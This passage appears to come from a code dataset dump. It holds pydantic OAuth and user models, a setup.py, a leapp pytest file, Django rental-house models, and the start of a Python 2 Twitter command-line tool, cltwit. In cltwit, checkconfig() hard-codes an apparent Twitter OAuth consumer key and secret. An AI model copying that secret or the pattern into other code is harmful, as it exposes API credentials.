client_secret: Optional[str] = Field(
None,
description=" The client secret. The client MAY omit the parameter if the client secret is an empty string.",
)
code: Optional[str] = Field(
None,
description="Required for `authorization_code` grant type. The value is what was returned from the authorization endpoint.",
)
redirect_uri: Optional[str] = Field(
None,
description="Required for `authorization_code` grant type. Specifies the callback location where the authorization was sent. This value must match the `redirect_uri` used to generate the original authorization_code.",
)
refresh_token: Optional[str] = Field(
None,
description="Required for `refresh_token` grant type. The refresh token previously issued to the client.",
)
state: Optional[str] = Field(
None,
description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery.",
)
set_as_cookie: Optional[bool] = Field(
False,
description="If `true`, the access (and refresh) token will be set as cookie instead of the response body.",
)
class OAuthToken(BaseModel):
token_type: str = Field(
..., description="The type of token this is, typically just the string `bearer`"
)
access_token: str = Field(..., description="The access token string.")
expires_in: Optional[int] = Field(
None,
description="The expiration time of the access token in seconds.",
)
refresh_token: Optional[str] = Field(
None, description="API token to refresh the sesion token (if it expires)."
)
scope: Optional[str] = Field(
None, description="The scopes contained in the access token."
)
id_token: Optional[str] = Field(
None,
description="OpenID Connect ID Token that encodes the user’s authentication information.",
)
class OAuthTokenIntrospection(BaseModel):
active: bool = Field(
...,
description="Indicator of whether or not the presented token is currently active.",
)
scope: Optional[str] = Field(
None,
description="A space-delimited list of scopes.",
)
client_id: Optional[str] = Field(
None,
description="Client identifier for the OAuth 2.0 client that requested this token.",
)
username: Optional[str] = Field(
None,
description="Human-readable identifier for the resource owner who authorized this token.",
)
token_type: Optional[str] = Field(
None,
description="Type of the token as defined in Section 5.1 of OAuth 2.0 [RFC6749].",
)
exp: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token will expire, as defined in JWT [RFC7519].",
)
iat: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token was originally issued, as defined in JWT [RFC7519].",
)
nbf: Optional[int] = Field(
None,
description="Timestamp, measured in the number of seconds since January 1 1970 UTC, indicating when this token is not to be used before, as defined in JWT [RFC7519].",
)
sub: Optional[str] = Field(
None,
description="Subject of the token, as defined in JWT [RFC7519]. Usually a machine-readable identifier of the resource owner who authorized this token.",
)
aud: Optional[str] = Field(
None,
description="Service-specific string identifier or list of string identifiers representing the intended audience for this token, as defined in JWT [RFC7519].",
)
iss: Optional[str] = Field(
None,
description="String representing the issuer of this token, as defined in JWT [RFC7519].",
)
jti: Optional[str] = Field(
None,
description="String identifier for the token, as defined in JWT [RFC7519].",
)
uid: Optional[str] = Field(
None,
description="The user ID. This parameter is returned only if the token is an access token and the subject is an end user.",
)
class AuthorizeResponseType(str, Enum):
TOKEN = "token"
CODE = "code"
class OAuth2ErrorDetails(BaseModel):
error: str
class OAuth2Error(HTTPException):
"""Basic exception for OAuth errors.
Implements the [RFC6749 error response](https://tools.ietf.org/html/rfc6749#section-5.2).
"""
def __init__(
self,
error: str,
) -> None:
"""Initializes the exception.
Args:
error: A single ASCII error code from the ones defined in RFC6749.
"""
super(OAuth2Error, self).__init__(
status_code=status.HTTP_400_BAD_REQUEST,
detail=error,
)
# TODO: Not used right now
# class OAuth2AuthorizeRequestForm:
# """OAuth2 Authorize Endpoint Request Form."""
# def __init__(
# self,
# response_type: AuthorizeResponseType = Form(
# ...,
# description="Either code for requesting an authorization code or token for requesting an access token (implicit grant).",
# ),
# client_id: Optional[str] = Form(
# None, description="The public identifier of the client."
# ),
# redirect_uri: Optional[str] = Form(None, description="Redirection URL."),
# scope: Optional[str] = Form(
# None, description="The scope of the access request."
# ),
# state: Optional[str] = Form(
# None,
# description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery",
# ),
# nonce: Optional[str] = Form(None),
# ):
# self.response_type = response_type
# self.client_id = client_id
# self.redirect_uri = redirect_uri
# self.scope = scope
# self.state = state
# self.nonce = nonce
USER_ID_PARAM = Path(
...,
title="User ID",
description="A valid user ID.",
# TODO: add length restriction
)
# User Models
class UserBase(BaseModel):
username: Optional[str] = Field(
None,
example="john-doe",
description="A unique username on the system.",
) # nickname
email: Optional[EmailStr] = Field(
None, example="<EMAIL>", description="User email address."
)
disabled: bool = Field(
False,
description="Indicates that user is disabled. Disabling a user will prevent any access to user-accessible resources.",
)
class UserInput(UserBase):
pass
class UserRegistration(UserInput):
# The password is only part of the user input object and should never returned
# TODO: a password can only be changed when used via oauth password bearer
# TODO: System admin can change passwords for all users
password: Optional[str] = Field(
None,
description="Password for the user. The password will be stored in as a hash.",
)
class User(UserBase):
id: str = Field(
...,
example="16fd2706-8baf-433b-82eb-8c7fada847da",
description="Unique ID of the user.",
)
technical_user: bool = Field(
False,
description="Indicates if the user is a technical user created by the system.",
)
created_at: datetime = Field(
default_factory=lambda: datetime.now(timezone.utc),
description="Timestamp of the user creation. Assigned by the server and read-only.",
)
last_activity: datetime = Field(
None, # If none the validator below will set last_activity to the create_at time
description="Last time the user accessed the system. Right now this is only updated when the user "
"calls the /users/me endpoint so that call should always be done when the user loads the UI.",
)
@pydantic.validator("last_activity", pre=True, always=True)
def default_last_activity(cls, v: datetime, *, values: Dict) -> datetime:
return v if v is not None else values["created_at"]
has_password: bool = Field(
True,
description="Indicates if the user log in with password or SSO",
) | en | 0.700912 | # Map to: select, insert, update, delete # Viewer, view: Allows admin access , Can only view existing resources. Permissions for read-only actions that do not affect state, such as viewing (but not modifying) existing resources or data. # Editor, edit, Contributor : Allows read/write access , Can create and manage all types of resources but can’t grant access to others. All viewer permissions, plus permissions for actions that modify state, such as changing existing resources. # Owner : Allows read-only access. Has full access to all resources including the right to edit IAM, invite users, edit roles. All editor permissions and permissions for the following actions # UNKNOWN = "unknown" # Deny? # return cls.UNKNOWN # For user sessions # DEPLOYMENT_TOKEN = "deployment-token" #read"], # Oauth Specific Code # TODO: Replaced with pydantic class # class OAuth2TokenRequestForm: # """OAuth2 Token Endpoint Request Form.""" # def __init__( # self, # grant_type: OAuth2TokenGrantTypes = Form( # ..., # description="Grant type. Determines the mechanism used to authorize the creation of the tokens.", # ), # username: Optional[str] = Form( # None, description="Required for `password` grant type. The user’s username." # ), # password: Optional[str] = Form( # None, description="Required for `password` grant type. The user’s password." # ), # scope: Optional[str] = Form( # None, # description="Scopes that the client wants to be included in the access token. List of space-delimited, case-sensitive strings", # ), # client_id: Optional[str] = Form( # None, # description="The client identifier issued to the client during the registration process", # ), # client_secret: Optional[str] = Form( # None, # description=" The client secret. The client MAY omit the parameter if the client secret is an empty string.", # ), # code: Optional[str] = Form( # None, # description="Required for `authorization_code` grant type. The value is what was returned from the authorization endpoint.", # ), # redirect_uri: Optional[str] = Form( # None, # description="Required for `authorization_code` grant type. Specifies the callback location where the authorization was sent. This value must match the `redirect_uri` used to generate the original authorization_code.", # ), # refresh_token: Optional[str] = Form( # None, # description="Required for `refresh_token` grant type. The refresh token previously issued to the client.", # ), # state: Optional[str] = Form( # None, # description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery.", # ), # set_as_cookie: Optional[bool] = Form( # False, # description="If `true`, the access (and refresh) token will be set as cookie instead of the response body.", # ), # ): # self.grant_type = grant_type # self.username = username # self.password = password # self.scopes = [] # if scope: # self.scopes = str(scope).split() # self.client_id = client_id # self.client_secret = client_secret # self.code = code # self.redirect_uri = redirect_uri # self.refresh_token = refresh_token # self.state = state # self.set_as_cookie = set_as_cookie OAuth2 Token Endpoint Request Form. Basic exception for OAuth errors. Implements the [RFC6749 error response](https://tools.ietf.org/html/rfc6749#section-5.2). Initializes the exception. Args: error: A single ASCII error code from the ones defined in RFC6749. # TODO: Not used right now # class OAuth2AuthorizeRequestForm: # """OAuth2 Authorize Endpoint Request Form.""" # def __init__( # self, # response_type: AuthorizeResponseType = Form( # ..., # description="Either code for requesting an authorization code or token for requesting an access token (implicit grant).", # ), # client_id: Optional[str] = Form( # None, description="The public identifier of the client." # ), # redirect_uri: Optional[str] = Form(None, description="Redirection URL."), # scope: Optional[str] = Form( # None, description="The scope of the access request." # ), # state: Optional[str] = Form( # None, # description="An opaque value used by the client to maintain state between the request and callback. The parameter SHOULD be used for preventing cross-site request forgery", # ), # nonce: Optional[str] = Form(None), # ): # self.response_type = response_type # self.client_id = client_id # self.redirect_uri = redirect_uri # self.scope = scope # self.state = state # self.nonce = nonce # TODO: add length restriction # User Models # nickname # The password is only part of the user input object and should never returned # TODO: a password can only be changed when used via oauth password bearer # TODO: System admin can change passwords for all users # If none the validator below will set last_activity to the create_at time | 2.086255 | 2 |
setup.py | richarddwang/hugdatafast | 19 | 8524 | import setuptools
from hugdatafast.__init__ import __version__
with open("README.md", "r") as fh:
long_description = fh.read()
REQUIRED_PKGS = [
'fastai>=2.0.8',
'fastscore>=1.0.1', # change of store_attr api
'datasets',
]
setuptools.setup(
name="hugdatafast",
version=__version__,
author="<NAME>",
author_email="<EMAIL>",
description="The elegant bridge between hugginface data and fastai",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/richarddwang/hugdatafast",
license='Apache 2.0',
packages=setuptools.find_packages(),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
python_requires='>=3.6',
install_requires=REQUIRED_PKGS,
keywords='datasets machine learning datasets metrics fastai huggingface',
) | import setuptools
from hugdatafast.__init__ import __version__
with open("README.md", "r") as fh:
long_description = fh.read()
REQUIRED_PKGS = [
'fastai>=2.0.8',
'fastscore>=1.0.1', # change of store_attr api
'datasets',
]
setuptools.setup(
name="hugdatafast",
version=__version__,
author="<NAME>",
author_email="<EMAIL>",
description="The elegant bridge between hugginface data and fastai",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/richarddwang/hugdatafast",
license='Apache 2.0',
packages=setuptools.find_packages(),
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
python_requires='>=3.6',
install_requires=REQUIRED_PKGS,
keywords='datasets machine learning datasets metrics fastai huggingface',
) | en | 0.229856 | # change of store_attr api | 1.294056 | 1 |
tests/scripts/test_repository_actor_definition.py | drehak/leapp | 0 | 8525 | import pytest
from leapp.repository.actor_definition import ActorDefinition, ActorInspectionFailedError, MultipleActorsError
from leapp.exceptions import UnsupportedDefinitionKindError
from leapp.repository import DefinitionKind
from helpers import repository_dir
import logging
import mock
_FAKE_META_DATA = {
'description': 'Fake Description',
'class_name': 'FakeActor',
'name': 'fake-actor',
'path': 'actors/test',
'tags': (),
'consumes': (),
'produces': (),
'dialogs': (),
}
def test_actor_definition(repository_dir):
with repository_dir.as_cwd():
logger = logging.getLogger('leapp.actor.test')
with mock.patch.object(logger, 'log') as log_mock:
definition = ActorDefinition('actors/test', '.', log=log_mock)
for kind in set(DefinitionKind.REPO_WHITELIST + DefinitionKind.ACTOR_WHITELIST):
if kind in DefinitionKind.ACTOR_WHITELIST:
definition.add(kind, '.')
else:
with pytest.raises(UnsupportedDefinitionKindError):
definition.add(kind, '.')
log_mock.error.assert_called_with(
"Attempt to add item type %s to actor that is not supported", kind.name)
log_mock.reset_mock()
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True]):
definition._module = True
assert definition.consumes == _FAKE_META_DATA['consumes']
assert definition.produces == _FAKE_META_DATA['produces']
assert definition.tags == _FAKE_META_DATA['tags']
assert definition.class_name == _FAKE_META_DATA['class_name']
assert definition.dialogs == _FAKE_META_DATA['dialogs']
assert definition.name == _FAKE_META_DATA['name']
assert definition.description == _FAKE_META_DATA['description']
dumped = definition.dump()
assert dumped.pop('path') == _FAKE_META_DATA['path']
assert dumped.pop('name') == definition.name
assert dumped.pop('files') == ('.',)
assert dumped.pop('libraries') == ('.',)
assert dumped.pop('tests') == ('.',)
assert dumped.pop('tools') == ('.',)
# Assert to ensure we covered all keys
assert not dumped
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[]):
definition._discovery = None
definition.discover()
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors') as mocked_actors:
mocked_actors.side_effect = RuntimeError('Test error')
definition._discovery = None
definition.discover()
with pytest.raises(MultipleActorsError):
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True, True]):
definition._discovery = None
definition.discover()
| import pytest
from leapp.repository.actor_definition import ActorDefinition, ActorInspectionFailedError, MultipleActorsError
from leapp.exceptions import UnsupportedDefinitionKindError
from leapp.repository import DefinitionKind
from helpers import repository_dir
import logging
import mock
_FAKE_META_DATA = {
'description': 'Fake Description',
'class_name': 'FakeActor',
'name': 'fake-actor',
'path': 'actors/test',
'tags': (),
'consumes': (),
'produces': (),
'dialogs': (),
}
def test_actor_definition(repository_dir):
with repository_dir.as_cwd():
logger = logging.getLogger('leapp.actor.test')
with mock.patch.object(logger, 'log') as log_mock:
definition = ActorDefinition('actors/test', '.', log=log_mock)
for kind in set(DefinitionKind.REPO_WHITELIST + DefinitionKind.ACTOR_WHITELIST):
if kind in DefinitionKind.ACTOR_WHITELIST:
definition.add(kind, '.')
else:
with pytest.raises(UnsupportedDefinitionKindError):
definition.add(kind, '.')
log_mock.error.assert_called_with(
"Attempt to add item type %s to actor that is not supported", kind.name)
log_mock.reset_mock()
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True]):
definition._module = True
assert definition.consumes == _FAKE_META_DATA['consumes']
assert definition.produces == _FAKE_META_DATA['produces']
assert definition.tags == _FAKE_META_DATA['tags']
assert definition.class_name == _FAKE_META_DATA['class_name']
assert definition.dialogs == _FAKE_META_DATA['dialogs']
assert definition.name == _FAKE_META_DATA['name']
assert definition.description == _FAKE_META_DATA['description']
dumped = definition.dump()
assert dumped.pop('path') == _FAKE_META_DATA['path']
assert dumped.pop('name') == definition.name
assert dumped.pop('files') == ('.',)
assert dumped.pop('libraries') == ('.',)
assert dumped.pop('tests') == ('.',)
assert dumped.pop('tools') == ('.',)
# Assert to ensure we covered all keys
assert not dumped
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[]):
definition._discovery = None
definition.discover()
with pytest.raises(ActorInspectionFailedError):
with mock.patch('leapp.repository.actor_definition.get_actors') as mocked_actors:
mocked_actors.side_effect = RuntimeError('Test error')
definition._discovery = None
definition.discover()
with pytest.raises(MultipleActorsError):
with mock.patch('leapp.repository.actor_definition.get_actor_metadata', return_value=_FAKE_META_DATA):
with mock.patch('leapp.repository.actor_definition.get_actors', return_value=[True, True]):
definition._discovery = None
definition.discover()
| en | 0.882709 | # Assert to ensure we covered all keys | 2.136643 | 2 |
iHome/house/models.py | yeyuning1/iHome | 2 | 8526 | <gh_stars>1-10
from django.db import models
# Create your models here.
from utils.models import BaseModel
class House(BaseModel):
'''房屋信息'''
user = models.ForeignKey('users.User', on_delete=models.CASCADE, verbose_name='房屋用户')
area = models.ForeignKey('address.Area', on_delete=models.SET_NULL, null=True, verbose_name='房屋地区')
title = models.CharField(max_length=64, null=False, verbose_name='房屋标题')
price = models.IntegerField(default=0, verbose_name='房屋单价') # 单价分
address = models.CharField(max_length=512, default='', verbose_name='房屋地址')
room_count = models.SmallIntegerField(default=1, verbose_name='房间数目')
acreage = models.IntegerField(default=0, verbose_name='房屋面积')
unit = models.CharField(max_length=32, default='', verbose_name='房屋单元') # 如几室几厅
capacity = models.SmallIntegerField(default=1, verbose_name='房屋容纳') # 房屋容纳的人数
beds = models.CharField(max_length=64, default='', verbose_name='房屋床铺配置')
deposit = models.IntegerField(default=0, verbose_name='房屋押金')
min_days = models.SmallIntegerField(default=1, verbose_name='最少入住天数')
max_days = models.SmallIntegerField(default=0, verbose_name='最大入住天数') # 0表示不限制
order_count = models.IntegerField(default=0, verbose_name='预计该房屋的订单数')
index_image_url = models.CharField(max_length=500, default='', verbose_name='房屋主图片的路径')
facilities = models.ManyToManyField('Facility')#配套设施
class Meta:
db_table = 'ih_house_info'
verbose_name = '房屋信息'
verbose_name_plural = verbose_name
class Facility(models.Model):
'''房屋设施信息'''
name = models.CharField(max_length=32, verbose_name='设施名称')
class Meta:
db_table = 'ih_facility_info'
verbose_name = '设施信息'
verbose_name_plural = verbose_name
class HouseImage(BaseModel):
'''房屋图片'''
house = models.ForeignKey(House, verbose_name='房屋信息', on_delete=models.CASCADE)
url = models.CharField(max_length=256, null=False, verbose_name='房屋图片地址')
class Meta:
db_table = 'ih_house_image'
verbose_name = '房屋图片'
verbose_name_plural = verbose_name
| from django.db import models
# Create your models here.
from utils.models import BaseModel
class House(BaseModel):
'''房屋信息'''
user = models.ForeignKey('users.User', on_delete=models.CASCADE, verbose_name='房屋用户')
area = models.ForeignKey('address.Area', on_delete=models.SET_NULL, null=True, verbose_name='房屋地区')
title = models.CharField(max_length=64, null=False, verbose_name='房屋标题')
price = models.IntegerField(default=0, verbose_name='房屋单价') # 单价分
address = models.CharField(max_length=512, default='', verbose_name='房屋地址')
room_count = models.SmallIntegerField(default=1, verbose_name='房间数目')
acreage = models.IntegerField(default=0, verbose_name='房屋面积')
unit = models.CharField(max_length=32, default='', verbose_name='房屋单元') # 如几室几厅
capacity = models.SmallIntegerField(default=1, verbose_name='房屋容纳') # 房屋容纳的人数
beds = models.CharField(max_length=64, default='', verbose_name='房屋床铺配置')
deposit = models.IntegerField(default=0, verbose_name='房屋押金')
min_days = models.SmallIntegerField(default=1, verbose_name='最少入住天数')
max_days = models.SmallIntegerField(default=0, verbose_name='最大入住天数') # 0表示不限制
order_count = models.IntegerField(default=0, verbose_name='预计该房屋的订单数')
index_image_url = models.CharField(max_length=500, default='', verbose_name='房屋主图片的路径')
facilities = models.ManyToManyField('Facility')#配套设施
class Meta:
db_table = 'ih_house_info'
verbose_name = '房屋信息'
verbose_name_plural = verbose_name
class Facility(models.Model):
'''房屋设施信息'''
name = models.CharField(max_length=32, verbose_name='设施名称')
class Meta:
db_table = 'ih_facility_info'
verbose_name = '设施信息'
verbose_name_plural = verbose_name
class HouseImage(BaseModel):
'''房屋图片'''
house = models.ForeignKey(House, verbose_name='房屋信息', on_delete=models.CASCADE)
url = models.CharField(max_length=256, null=False, verbose_name='房屋图片地址')
class Meta:
db_table = 'ih_house_image'
verbose_name = '房屋图片'
verbose_name_plural = verbose_name | zh | 0.97096 | # Create your models here. 房屋信息 # 单价分 # 如几室几厅 # 房屋容纳的人数 # 0表示不限制 #配套设施 房屋设施信息 房屋图片 | 2.238565 | 2 |
cltwit/main.py | Psycojoker/cltwit | 0 | 8527 | <filename>cltwit/main.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Cltwit is a command line twitter utility
Author : <NAME>
Date : 2013
"""
import os
import sys
import re
import getopt
import gettext
import sqlite3
import webbrowser
import ConfigParser
from sqlite2csv import sqlite2csv
from cltwitdb import cltwitdb
from utils import LocalTimezone
from cltwitreport import TweetsReport
APP_NAME = 'cltwit'
LOC_PATH = os.path.dirname(__file__) + '/locale'
gettext.find(APP_NAME, LOC_PATH)
gettext.install(APP_NAME, LOC_PATH, True)
try:
import tweepy
except ImportError:
print(_("Veuillez installer tweetpy https://github.com/tweepy/tweepy"))
sys.exit()
# Répertoire pour conf et bdd
__cltwitdir__ = os.path.expanduser("~/.config/cltwit")
# Fichier de configuration
__configfile__ = __cltwitdir__ + "/cltwit.conf"
# base de données et table sqlite
__dblocation__ = __cltwitdir__ + '/data.db'
__tablename__ = 'twitter'
__Local__ = LocalTimezone()
# gestion des couleurs sur le terminal
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
def has_colours(stream):
"""Vérifier la prise en charge des couleurs par le terminal"""
if not hasattr(stream, "isatty"):
return False
if not stream.isatty():
return False # couleurs auto sur un TTY
try:
import curses
curses.setupterm()
return curses.tigetnum("colors") > 2
except:
# Si erreur on suppose false
return False
__has_colours__ = has_colours(sys.stdout)
def printout(text, colour=WHITE):
"""Print en couleur"""
if __has_colours__:
seq = "\x1b[1;%dm" % (30 + colour) + text + "\x1b[0m"
sys.stdout.write(seq)
else:
sys.stdout.write(text.encode("Utf-8"))
def checkdb():
""" Vérifier la présence de la bdd sqlite et la créer si absente """
if (not os.path.exists(__dblocation__)):
printout(_(u"Vous devez d'abord lancer la commande --database create \
pour créer une base de données de vos tweets."), RED)
sys.exit()
def checkconfig():
"""Récupérer la configuration ou la créer"""
# On ouvre le fichier de conf
config = ConfigParser.RawConfigParser()
try:
config.read(__configfile__)
if config.has_option('twitterapi', 'access_token'):
access_token = config.get('twitterapi', 'access_token')
if config.has_option('twitterapi', 'access_password'):
access_password = config.get('twitterapi', 'access_password')
except:
pass
auth = tweepy.OAuthHandler("Jus1rnqM6S0WojJfOH1kQ",
"AHQ5sTC8YYArHilXmqnsstOivY6ygQ2N27L1zBwk")
# Si aucune conf , autorisation de connexion à twitter via OAuth
if not(config.has_option('twitterapi', 'access_token') and
config.has_option('twitterapi', 'access_password')):
# On ouvre le navigateur web pour récupếrer le numéro d'autorisation
while True:
try:
webbrowser.open(auth.get_authorization_url())
var = raw_input(_("Entrez le token !\n"))
auth.get_access_token(var)
except Exception, e:
print(str(e))
continue
break
var = auth.access_token
# On récupère le token et le password
access_password = str(var).split("&")[0].split("=")[1]
access_token = str(var).split("&")[1].split("=")[1]
# écrire le fichier de conf avec les informations récupérées
try:
cfgfile = open(__configfile__, 'w')
if not(config.has_section('twitterapi')):
config.add_section('twitterapi')
config.set('twitterapi', 'access_token', access_token)
config.set('twitterapi', 'access_password', access_password)
config.write(cfgfile)
except IOError:
pass
finally:
cfgfile.close()
else: # Si un fichier de conf existait déjà
auth.set_access_token(access_token, access_password)
return auth
def login():
""" Se connecter à l'api twitter via tweepy """
auth = checkconfig()
api = tweepy.API(auth)
# On vérifie la connexion à l'api en récupérant le user name
try:
twittername = api.me().screen_name
except Exception, e:
if 'Unable to get username' in (str(e)):
printout(_(u"Impossible de s'authentifier avec l'api Twitter.\
Fonctionne en mode déconnecté"), RED)
print("\n")
twittername = "offline_mode"
printout(_(u"Authentifié avec le user twitter {0}").format(twittername.decode('utf-8')), GREEN)
print("\n")
return api, auth, twittername
def get_friends_followers(api):
"""Renvoie la liste des id des friends et followers"""
friend_id = []
follower_id = []
printout(_(u"Récupération des Followers..."), YELLOW)
print("\n")
for follower in tweepy.Cursor(api.followers).items():
follower_id.append(follower.id)
printout((u"Récupération des Friends..."), YELLOW)
print("\n")
for friend in tweepy.Cursor(api.friends).items():
friend_id.append(friend.id)
return friend_id, follower_id
def get_diff(liste1, liste2):
"""Renvoie les objets de liste1 qui ne sont pas dans liste2"""
return list(set(liste1).difference(set(liste2)))
def follow_users(api, user):
"""Suivre une personne"""
try:
api.create_friendship(user)
printout(_(u"Vous suivez maintenant {0}").format(api.get_user(user).screen_name.decode('utf-8')), GREEN)
except Exception, e:
print(e)
def unfollow_user(api, user):
"""Cesser de suivre une personne"""
try:
api.destroy_friendship(user)
printout(_(u"Vous ne suivez plus {0}").format(api.get_user(user).screen_name.decode('utf-8')), GREEN)
except Exception, e:
print(e)
def main(argv=None):
""" Point d'entrée """
# Si le répertoire pour la conf et la base de données n'existe pas le créer
if not os.path.exists(__cltwitdir__):
os.makedirs(__cltwitdir__)
#~ twittername = "offline_mode"
# Traitement des arguments
if argv is None:
argv = sys.argv
if len(argv) == 1:
help()
try:
opts, args = getopt.getopt(sys.argv[1:], "r:ahfut:o:s:d:",
["report", "api", "help", "follow", "unfollow", "tweet=", "output=", "search=", "database="])
except getopt.GetoptError, err:
print(err)
help()
sys.exit()
# traitement des options
for option, value in opts:
if option in ('-a', '--api'):
api, auth, twittername = login()
res = api.rate_limit_status()
rtime = res['reset_time']
rhits = res['remaining_hits']
hlimit = res['hourly_limit']
from dateutil.parser import parse
drtime = parse(rtime)
printout(_("Informations sur l'utilisation de l'api Twitter"), YELLOW)
print("\n")
# Définir l'heure locale qui correspond à l'heure renvoyée
# par l'api Twitter
rlocaltime = drtime.astimezone(__Local__)
printout(_("Maximum d'appels par heure: "), BLUE)
print hlimit
printout(_("Nombre d'appels restants: "), BLUE)
print rhits
printout(_("Heure du prochain reset: "), BLUE)
print rlocaltime.strftime("%H:%M %Y-%m-%d")
if option in ('-r', '--report'):
api, auth, twittername = login()
checkdb()
conn = sqlite3.connect(__dblocation__)
c = conn.cursor()
c.execute("select substr(date, 1,4) from twitter order by date asc limit 1")
dmois = c.fetchone()[0]
c.execute("select substr(date, 1,4) from twitter order by date desc limit 1")
fmois = c.fetchone()[0]
# Requête des données à exporter
dd = dict()
for a in range(int(dmois), int(fmois) + 1):
result = []
for m in range(1, 13):
mois = ('{num:02d}'.format(num=m))
c.execute("select count(*) from twitter where substr(date, 1,4) = '{0}' and substr(date, 6,2) = '{1}'".format(a, mois))
result.append(c.fetchone()[0])
dd[a] = result
c.close()
conn.close()
treport = TweetsReport(value)
# twittername = "offline"
treport.ecrireTitre(twittername)
nb = 0
for annee, donnees in dd.items():
nb += 1
if nb == 4:
treport.NextPage()
nb = 1
saut = 0
if nb == 1:
saut = 0
if nb == 2:
saut = 200
if nb == 3:
saut = 400
treport.ecrireLegende(saut, annee, donnees)
treport.addPie(saut, donnees)
treport.save()
printout(_(u"Report {0} créé !").format(value), GREEN)
print("\n")
sys.exit(0)
if option in ('-d', '--database'):
if value in ('u', 'update'):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Mettre à jour la base de données
db = cltwitdb(__dblocation__, __tablename__)
printout(_(u"Mise à jour de la base de données de {0}").format(twittername.decode('utf-8')), YELLOW)
print("\n")
nb = db.update(api, twittername)
printout(_(u"Ajout de {0} tweet(s) dans la base de données.").format(nb), GREEN)
if value in ('c', 'create'):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer la base de données
db = cltwitdb(__dblocation__, __tablename__)
printout(_(u"Création de la liste des tweets de ") + twittername.decode('utf-8'), YELLOW)
db.create(api, twittername)
printout(_(u"Base de données crée"), GREEN)
sys.exit()
#~ database_create(api,twittername)
if option in ("-o", "--output"):
# Exporter en csv
checkdb()
conn = sqlite3.connect(__dblocation__)
c = conn.cursor()
# Requête des données à exporter
c.execute('select date, tweet, url from {0} order by date desc'.format(__tablename__))
# On appelle la classe sqlite2csv qui se charge de l'export
export = sqlite2csv(open(value, "wb"))
# Entête du fichier csv
export.writerow(["Date", "Tweet", "URL"])
# Lignes du fichier csv
export.writerows(c)
# On ferme la connexion sqlite et le curseur
c.close()
conn.close()
printout(_(u"Fichier csv {0} créé.").format(value.decode('utf-8')), GREEN)
sys.exit()
if option in ("-s", "--search"):
# Rechercher un motif dans la base des tweets
checkdb()
printout(_(u"Recherche de {0} dans vos anciens tweets...")
.format(value.decode('utf-8')), YELLOW)
print("\n")
# la méthode search retourne un tuple avec les champs
# qui contiennent le motif
db = cltwitdb(__dblocation__, __tablename__)
results = db.search(value, "tweet")
for result in results:
print((u"{0} -> {1}\n{2}\n\n").format(result[1].decode('utf-8'), result[4].decode('utf-8'), result[2].decode('utf-8')))
if option in ("-u", "--unfollow"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer les liste friend et followers (par id)
friend_id, follower_id = get_friends_followers(api)
# Création des listes follow et unfollow
follow_liste = get_diff(follower_id, friend_id)
unfollow_liste = get_diff(friend_id, follower_id)
# Un-follow
printout(_("Vous suivez {0} personnes qui ne vous suivent pas.")
.format(len(unfollow_liste)), YELLOW)
print("\n")
printout(_("Voulez changer cela ? (o/N)"), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
for user in unfollow_liste:
printout(_("Voulez-vous cesser de suivre {0} ? (o/N)")
.format(api.get_user(user).screen_name), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
unfollow_user(api, user)
if option in ("-f", "--follow"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer les liste friend et followers (par id)
friend_id, follower_id = get_friends_followers(api)
# Création des listes follow et unfollow
follow_liste = get_diff(follower_id, friend_id)
unfollow_liste = get_diff(friend_id, follower_id)
# follow
printout(_("{0} personnes vous suivent alors que vous ne les suivez pas.")
.format(len(follow_liste)), YELLOW)
print("\n")
printout(_("Voulez changer cela ? (o/N)"), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
for user in follow_liste:
printout(_("Voulez-vous suivre {0} ? (o/N)"
.format(api.get_user(user).screen_name)), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
follow_users(api, user)
if option in ("-t", "--tweet"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Envoyer un tweet
tweet_size = len(re.sub("https://\S*", "X"*23, re.sub("http://\S*", "X"*22, value)))
if tweet_size < 141:
api.update_status(value)
print("\n")
printout(_(u"Tweet envoyé !"), GREEN)
else:
printout(_(u"La limite pour un tweet est de 140 caractères, votre message \
fait {0} caractères de trop").format(str(tweet_size - 140).decode('utf-8')), RED)
sys.exit()
if option in ("-h", "--help"):
help()
def help():
printout(_(u"""
Usage :
cltwit [OPTIONS]
Options :
-f (--follow)
